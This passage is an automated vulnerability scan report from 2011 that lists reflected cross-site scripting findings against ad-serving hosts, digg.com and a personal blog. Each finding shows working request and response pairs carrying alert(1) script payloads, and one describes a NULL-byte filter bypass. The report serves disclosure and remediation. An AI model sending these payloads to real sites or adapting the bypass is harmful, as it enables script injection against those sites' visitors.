User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:09:05 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p68511049=exp=1&initExp=Mon Jan 31 17:09:05 2011&recExp=Mon Jan 31 17:09:05 2011&prad=264243128&arc=186035359f00d0%3Cscript%3Ealert%281%29%3C%2Fscript%3E4ba25d4dfdf&; expires=Sun 01-May-2011 17:09:05 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296493745; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25241

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264243128",Pid:"p68511049",Arc:"186035359f00d0<script>alert(1)</script>4ba25d4dfdf",Location:COMSCORE.BMX.Broker.Location,Title:COMSCORE.BMX.Broker.Title,Referrer:COMSCORE.BMX.Broker.Referrer,Grp:COMSCORE.BMX.Broker.getGrp("186035359f00d0<script>
...[SNIP]...

1.4. http://ar.voicefive.com/bmx3/broker.pli [PRAd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the PRAd request parameter is copied into the HTML document as plain text between tags. The payload ce57c<script>alert(1)</script>1e6668e0674 was submitted in the PRAd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. As with 1.3, the response is served as application/x-javascript and the value lands inside a double-quoted JavaScript string literal (Prad:"..."), so the appropriate fix is JavaScript-string escaping or JSON serialisation rather than HTML-encoding. The value is also persisted into the ar_p68511049 cookie (see the Set-Cookie header below).

Request

GET /bmx3/broker.pli?pid=p68511049&PRAd=264243128ce57c<script>alert(1)</script>1e6668e0674&AR_C=186035359 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://redcated/MRT/iview/264243128/direct;wi.640;hi.480/01?ENN_rnd=12964914777625&click=http://www.ectnews.com/adsys/link/%3Fcreative%3d7040%26ENN_rnd%3d12964914777625%26ENN_target=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; UID=1d29d89e-72.246.30.75-1294456810

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 31 Jan 2011 17:09:04 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p68511049=exp=1&initExp=Mon Jan 31 17:09:04 2011&recExp=Mon Jan 31 17:09:04 2011&prad=264243128ce57c%3Cscript%3Ealert%281%29%3C%2Fscript%3E1e6668e0674&arc=186035359&; expires=Sun 01-May-2011 17:09:04 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296493744; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25200

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264243128ce57c<script>alert(1)</script>1e6668e0674",Pid:"p68511049",Arc:"186035359",Location:COMSCORE.BMX.Broker.Location,Title:COMSCORE.BMX.Broker.Title,Referrer:COMSCORE.BMX.Broker.Referrer,Grp:COMSCORE.BMX.Broker.getGrp("186035359"),Exp:COMSCORE.BM
...[SNIP]...

1.5. http://blog.sherifmansour.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.sherifmansour.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f455"><script>alert(1)</script>18723730872 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9f455\"><script>alert(1)</script>18723730872 in the application's response. The application has prefixed the quote with a backslash (addslashes-style escaping), but that is a string-literal escape and has no meaning inside an HTML attribute: the double quote still terminates the href value, so the injected tag is parsed.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9f455"><script>alert(1)</script>18723730872=1 HTTP/1.1
Host: blog.sherifmansour.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:20:00 GMT
Server: Apache
X-Pingback: http://blog.sherifmansour.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 105461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
<a href="http://blog.sherifmansour.com/?9f455\"><script>alert(1)</script>18723730872=1&paged=2">
...[SNIP]...

1.6. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005f73f"><script>alert(1)</script>261222dadcb was submitted in the REST URL parameter 1. This input was echoed as 5f73f"><script>alert(1)</script>261222dadcb in the application's response; as the response below shows, the full request path including the encoded NULL byte is written into the href attribute of a <link> element.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%005f73f"><script>alert(1)</script>261222dadcb HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 20:57:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1454464866566799616%3A175; expires=Tue, 01-Feb-2011 20:57:52 GMT; path=/; domain=digg.com
Set-Cookie: d=cad0fc2207f84a0081bcfda18c26e198b304cfae413597d0eedfcaf502baed6d; expires=Sun, 31-Jan-2021 07:05:32 GMT; path=/; domain=.digg.com
X-Digg-Time: D=423344 10.2.130.26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15618

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%005f73f"><script>alert(1)</script>261222dadcb.rss">
...[SNIP]...

1.7. http://dm.de.mookie1.com/2/B3DM/2010DM/11768404287@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11768404287@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca2f4"><script>alert(1)</script>09dd599035 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMca2f4"><script>alert(1)</script>09dd599035/2010DM/11768404287@x23?USNetwork/RS_SELL_2011Q1_247_RTG_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMca2f4"><script>alert(1)</script>09dd599035/2010DM/1550664646/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.8. http://dm.de.mookie1.com/2/B3DM/2010DM/11768404287@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11768404287@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78496"><script>alert(1)</script>be0a7656f5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM78496"><script>alert(1)</script>be0a7656f5/11768404287@x23?USNetwork/RS_SELL_2011Q1_247_RTG_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:23 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM78496"><script>alert(1)</script>be0a7656f5/499192576/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IM
...[SNIP]...

1.9. http://dm.de.mookie1.com/2/B3DM/2010DM/11768404287@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11768404287@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f63fa"><script>alert(1)</script>3687d15fefd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11768404287@x23f63fa"><script>alert(1)</script>3687d15fefd?USNetwork/RS_SELL_2011Q1_247_RTG_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/300x250/autnwsrlsttch/ss/a@x15
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1315845720/x23f63fa"><script>alert(1)</script>3687d15fefd/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.10. http://dm.de.mookie1.com/2/B3DM/2010DM/1772729617@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1772729617@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d64b0"><script>alert(1)</script>1398b99ec43 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMd64b0"><script>alert(1)</script>1398b99ec43/2010DM/1772729617@x23?USNetwork/RS_SELL_2011Q1_247_RTG_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMd64b0"><script>alert(1)</script>1398b99ec43/2010DM/1412305390/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.11. http://dm.de.mookie1.com/2/B3DM/2010DM/1772729617@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1772729617@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75644"><script>alert(1)</script>cd999b58b78 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM75644"><script>alert(1)</script>cd999b58b78/1772729617@x23?USNetwork/RS_SELL_2011Q1_247_RTG_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:27 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM75644"><script>alert(1)</script>cd999b58b78/1470482050/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

1.12. http://dm.de.mookie1.com/2/B3DM/2010DM/1772729617@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1772729617@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dec1f"><script>alert(1)</script>7522f40b207 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1772729617@x23dec1f"><script>alert(1)</script>7522f40b207?USNetwork/RS_SELL_2011Q1_247_RTG_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/286984043/x23dec1f"><script>alert(1)</script>7522f40b207/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.13. http://dm.de.mookie1.com/2/B3DM/2010DM/1990402400@x23 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1990402400@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cc89"><script>alert(1)</script>015ecd77db8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM1cc89"><script>alert(1)</script>015ecd77db8/2010DM/1990402400@x23?USNetwork/RS_SELL_2011Q1_247_RTG_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM1cc89"><script>alert(1)</script>015ecd77db8/2010DM/384225239/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.14. http://dm.de.mookie1.com/2/B3DM/2010DM/1990402400@x23 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1990402400@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f88a5"><script>alert(1)</script>a0d712db7ee was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMf88a5"><script>alert(1)</script>a0d712db7ee/1990402400@x23?USNetwork/RS_SELL_2011Q1_247_RTG_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMf88a5"><script>alert(1)</script>a0d712db7ee/140603636/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

1.15. http://dm.de.mookie1.com/2/B3DM/2010DM/1990402400@x23 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/1990402400@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2110c"><script>alert(1)</script>f165b1bce56 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/1990402400@x232110c"><script>alert(1)</script>f165b1bce56?USNetwork/RS_SELL_2011Q1_247_RTG_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/ectnews/runofnetwork/728x90/autnwsrlsttch/ss/a@Top1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:11:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/

